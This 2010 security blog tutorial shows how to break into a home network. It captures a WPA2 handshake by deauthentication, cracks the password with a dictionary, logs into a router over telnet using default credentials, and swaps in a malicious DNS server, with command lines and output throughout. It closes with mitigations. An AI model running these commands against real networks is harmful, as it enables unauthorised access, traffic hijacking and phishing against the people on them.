Saturday, 17 July 2010

Attacking secured clients via a insecure wireless router

Anyone who knows anything about IT Security knows that Wifi routers are vulnerable to attack.

This is especially true with the wireless routers in the average home because of the typically poor default security settings of equipment purchased for the home.

In addition fundamental flaws found in WEP, or WPA setups, combined with weak passwords, make wireless hacking relatively easy.

However, these days it is more common for PC vendors, to sell laptops and desktops with a reasonably good level of security out-of-the-box.

Typical new systems will have modern operating systems, such as OSX Snow Leopard, Windows7 or Ubuntu, with operating system updates enabled, a firewall correctly configured by default, and often evaluation or full-licence Anti-virus software installed with updates enabled.

Excellent, so people with new computers are safe then, aren't they?

No they are not. This is because homes have home-networks, and typical home users know nothing about network security. Also, because the level of security provided by the default configurations of many home broadband routers is still poor, even users with new and well configured PCs are at risk.

Let's take it as read, that there are many old systems out there with no Anti-virus, no firewall, no patch management and completely open wireless access points or WEP. Let's look at a more sophisticated Wireless and network attack against a home network, with a well configured client PC.

Please only test these techniques on your OWN equipment, or where you have express permission.

Hacking the wireless

Because I have discussed WEP hacking previously, we will look at hashcracking WPA.

If an average user chooses their own password, chances are that they will make a crap choice (because a crap password is easy to remember ;o)

So lets see how to crack a crap WPA password:
In Backtrack, start airmon on the correct channel dumping the captured traffic to a file

airodump-ng --channel 7 -w homewpa mon0

 CH  7 ][ Elapsed: 4 s ][ 2010-07-16 22:32

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:90:D0:2A:0C:7F  -38   0       71       30    0   7  54e  WPA2 CCMP   PSK  SlowNet

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:90:D0:2A:0C:7F  00:22:FB:18:8B:02   -1   54e- 0      0       21

Now we can see there is a client, if we deauthenticate this client it should automatically try to reauthenticate and we will capture the password hash, which we can they try to crack.

aireplay-ng -0 1 -a 00:90:D0:2A:0C:7F -c 00:22:FB:18:8B:02 mon0
22:36:20  Waiting for beacon frame (BSSID: 00:90:D0:2A:0C:7F) on channel 7
22:36:20  Sending 64 directed DeAuth. STMAC: [00:22:FB:18:8B:02] [25|121 ACKs]

Now hopefully our victim client will try to reauthenticate. Give it a few seconds and then try aircrack.

Of course, you will need to have a dictionary file, that contains the password, but these are easy to create, and there are loads of dictionaries available to download which contain thousands of the most commonly used passwords. It's really easy.

aircrack-ng -w dict.txt homewpa-04.cap
Opening homewpa-04.cap
Read 10916 packets.

   #  BSSID              ESSID                     Encryption

   1  00:90:D0:2A:0C:7F  SlowNet                   WPA (1 handshake)

                                 Aircrack-ng 1.1 r1738

                   [00:00:00] 1 keys tested (39.69 k/s)

                           KEY FOUND! [ password2 ]

      Master Key     : 9A DA C7 AA F5 91 A3 0D 5E 65 51 E1 E9 75 C6 7D
                       12 E2 05 3E 8B 81 75 95 77 AB 07 E8 B4 E2 86 5F

      Transient Key  : EC 0A E9 FC 0A 52 21 4F E3 44 BE 9F 01 EA 7D 6E
                       AE B0 E4 1B C2 63 B8 19 95 87 C9 B0 42 FC E9 F5
                       D6 7C 97 06 F0 15 85 11 4E AE DF 8A F9 1D D4 BC
                       E6 E6 6A 58 5F 1C C7 EF CA BB BE 23 FC D5 2F A0

      EAPOL HMAC     : AA 2E D5 5D 52 7A DF 8B EF 01 0E D9 24 47 56 8A

This only took a few seconds and, Tada! One password, and we are as good as in.

However, on gaining access to the network, we discover that the only client there is secured.


Starting Nmap 5.30BETA1 ( ) at 2010-07-16 22:47 BST
Nmap scan report for mytarget.lan (
Host is up (0.000034s latency).
All 1000 scanned ports on mytarget.lan ( are closed

Nmap done: 253 IP addresses (1 host up) scanned in 5.97 seconds

Looks like the client target system has some kind of client-based firewall, and is well configured, so game over?

Err... Nope...

Other options at this stage include traffic sniffing and Man In The Middle attacks (MITM) such as ARP spoofing, but we are going to look at DNS substitution.

Hacking the network via the router

Once we are on the network, we are an insider, and the typical response for a home router is to give us an IP address if we ask for it with DHCP. We can then attack the router, and change its configuration to help us to attack the client PCs.

First lets have a look at the router with nmap:


Starting Nmap 5.30BETA1 ( ) at 2010-07-14 06:48 BST
Nmap scan report for dsldevice.lan (
Host is up (0.0080s latency).
Not shown: 995 filtered ports
21/tcp   open  ftp
23/tcp   open  telnet
80/tcp   open  http
443/tcp  open  https
1723/tcp open  pptp
MAC Address: 00:0E:50:EC:B2:A6 (Thomson Telecom Belgium)

Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds

So we have a Thomson Router, with a Web UI and telnet and FTP access.
Poking around with a web scanning tool (or looking at the web UI) confirms the model:

./ -host -port 80
- Nikto v2.1.1
+ Target IP:
+ Target Hostname:    dsldevice.lan
+ Target Port:        80
+ Start Time:         2010-07-15 05:56:03
+ Server: No banner retrieved
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server banner has changed from  to Speed Touch WebServer/1.0, this may suggest a WAF is in place
+ Default account found for '"ST585v6"' at /Orders/ (/Orders/order_log_v12.dat) (ID 'sysadmin', PW 'password'). Ricoh Aficio
+ 6414 items checked: 16 error(s) and 1 item(s) reported on remote host
+ End Time:           2010-07-15 06:04:29 (506 seconds)
+ 1 host(s) tested

And looking up in the manual for a ST585v6 online, we find the default username is "Administrator" with a blank password, and we can login to telnet with this:

Connected to
Escape character is '^]'.
Username : Administrator
Password :

                             ______  SpeedTouch 585
                        /         /\
                  _____/__       /  \
                _/       /\_____/___ \  Copyright (c) 1999-2007, THOMSON
               //       /  \       /\ \
       _______//_______/    \     / _\/______
      /      / \       \    /    / /        /\
   __/      /   \       \  /    / /        / _\__
  / /      /     \_______\/    / /        / /   /\
 /_/______/___________________/ /________/ /___/  \
 \ \      \    ___________    \ \        \ \   \  /
  \_\      \  /          /\    \ \        \ \___\/
     \      \/          /  \    \ \        \  /
      \_____/          /    \    \ \________\/
           /__________/      \    \  /
           \   _____  \      /_____\/
            \ /    /\  \    /___\/
             /____/  \  \  /
             \    \  /___\/


(even if the password had been changed, a quick blast with hydra on the telnet port, using a good dictionary, would likely find us our password)

All the help is still enabled in this configuration, so a few minutes poking around with that, and we can start attacking the network by removing the DNS server settings and adding ones of our own.

Introducing malicious DNS servers

Even some IT people underestimate the security importance of DNS; but basically, DNS provides hostname to IP address resolution. If we can control the DNS server that the clients use, we can use a malicious DNS server to control where the clients go, for web attacks, phishing, and more.

This can be done either by changing the DHCP configuration, or the forward lookup servers that the router uses for DNS.

Let's see how deep the rabbit hole goes:

{Administrator}[dns server route]=>:dns server route list

DNS Server Entries:
  DNS Server     Source              Metric  Intf     State  Domain
D                          10    Internet  UP      *
D                          10    Internet  UP      *

So, lets remove the default DNS servers, and add our own, i.e. the one running on our attacking system, or one we have previously set up on the web somewhere.

{Administrator}[dns server route]=>:dns server route flush
{Administrator}[dns server route]=>:dns server route add dns= metr
ic=10 intf=Internet
{Administrator}[dns server route]=>list

DNS Server Entries:
  DNS Server     Source              Metric  Intf     State  Domain
S                          10    Internet  UP      *

So we have substituted in our malicious DNS server, I'll leave the rest up to your imagination.

The mitigations for these threats are
  • Change the default password on the router to something long and strong
  • Enable WPA2 with PSK, and again, with a strong password
  • Choose a router that has anti-hacking functions, such as IDS or IPS
  • Know how to check your router's logs, and check them from time-to-time
  • Look out for odd clients you don't recognise on your network
Be good, and stay safe

1 comment:

  1. Great post....Thank you for posting the great content……I found it quiet interesting, hopefully you will keep posting such blogs…
    If you Want more details kindly Visit us